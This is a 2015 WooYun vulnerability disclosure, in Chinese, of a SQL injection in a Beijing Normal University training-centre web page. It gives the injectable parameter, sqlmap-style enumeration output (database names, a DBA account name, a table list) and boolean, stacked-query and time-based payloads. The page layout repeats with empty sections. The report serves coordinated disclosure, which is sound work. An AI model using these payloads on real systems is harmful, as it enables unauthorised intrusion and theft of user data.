北京师范大学教育培训中心一处SQL注入漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0136144

漏洞标题：北京师范大学教育培训中心一处SQL注入漏洞

漏洞作者： Hex

提交时间：2015-08-25 20:01

修复时间：2015-10-11 00:02

公开时间：2015-10-11 00:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-25：细节已通知厂商并且等待厂商处理中
2015-08-27： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-09-06：细节向核心白帽子及相关领域专家公开
2015-09-16：细节向普通白帽子公开
2015-09-26：细节向实习白帽子公开
2015-10-11：细节向公众公开

简要描述：

北京师范大学主站一处SQL注入漏洞

详细说明：

1# 注入点位于北京师范大学教育培训中心

http://**.**.**.**/WebGroup.aspx?tpid=0&classid=85&groupid=59

groupid参数存在注入
2# 数据库类型

banner:
---
Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) 
	Apr  2 2010 15:48:46 
	Copyright (c) Microsoft Corporation
	Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
---

3# 9个库

available databases [9]:
[*] ASPState
[*] Bnuedu_New
[*] dbwx20141019
[*] master
[*] model
[*] msdb
[*] tempdb
[*] WowXue
[*] wowxue20141206

4# 当前用户和当前库

current user:    'bsd_20141230'
current database:    'Bnuedu_New'
current user is DBA:    True

5# Bnuedu_New库内容，有500多个用户

Database: Bnuedu_New
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| dbo.bnuedu_Dynamic           | 26009   |
| dbo.bnuedu_Content           | 2117    |
| dbo.V_bnuedu_Content         | 2117    |
| dbo.bnuedu_Video             | 622     |
| dbo.V_bnuedu_Video           | 622     |
| dbo.bnuedu_User              | 540     |
| dbo.bnuedu_Card              | 538     |
| dbo.V_bnuedu_Card            | 537     |
| dbo.bnuedu_UserInfo          | 528     |
| dbo.V_bnuedu_User            | 486     |
| dbo.bnuedu_VideoGroup        | 115     |
| dbo.V_bnuedu_VideoGroup      | 115     |
| dbo.bnuedu_LiveLesson        | 112     |
| dbo.bnuedu_Apply             | 48      |
| dbo.bnuedu_Class             | 31      |
| dbo.bnuedu_PostGraduateApply | 27      |
| dbo.bnuedu_WebConfig         | 21      |
| dbo.bnuedu_Channel           | 16      |
| dbo.bnuedu_Admin             | 7       |
| dbo.bnuedu_Resource          | 2       |
| dbo.V_bnuedu_Resource        | 2       |
| dbo.bnuedu_PaperAnswer       | 1       |
+------------------------------+---------+

6# 鉴于盲注感人的效率，不浪费时间其他库就没跑了

漏洞证明：

Place: GET
Parameter: groupid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tpid=0&classid=85&groupid=59 AND 2373=2373
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: tpid=0&classid=85&groupid=59; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tpid=0&classid=85&groupid=59 WAITFOR DELAY '0:0:5'--

修复方案：

建议全站检测下，别处应该还有注入

版权声明：转载请注明来源 Hex@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-08-27 00:00

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT下发给赛尔教育，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0136144

漏洞标题：北京师范大学教育培训中心一处SQL注入漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者： Hex

提交时间：2015-08-25 20:01

修复时间：2015-10-11 00:02

公开时间：2015-10-11 00:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Hex@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0136144

漏洞标题：北京师范大学教育培训中心一处SQL注入漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者： Hex

提交时间：2015-08-25 20:01

修复时间：2015-10-11 00:02

公开时间：2015-10-11 00:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0136144"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Hex@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：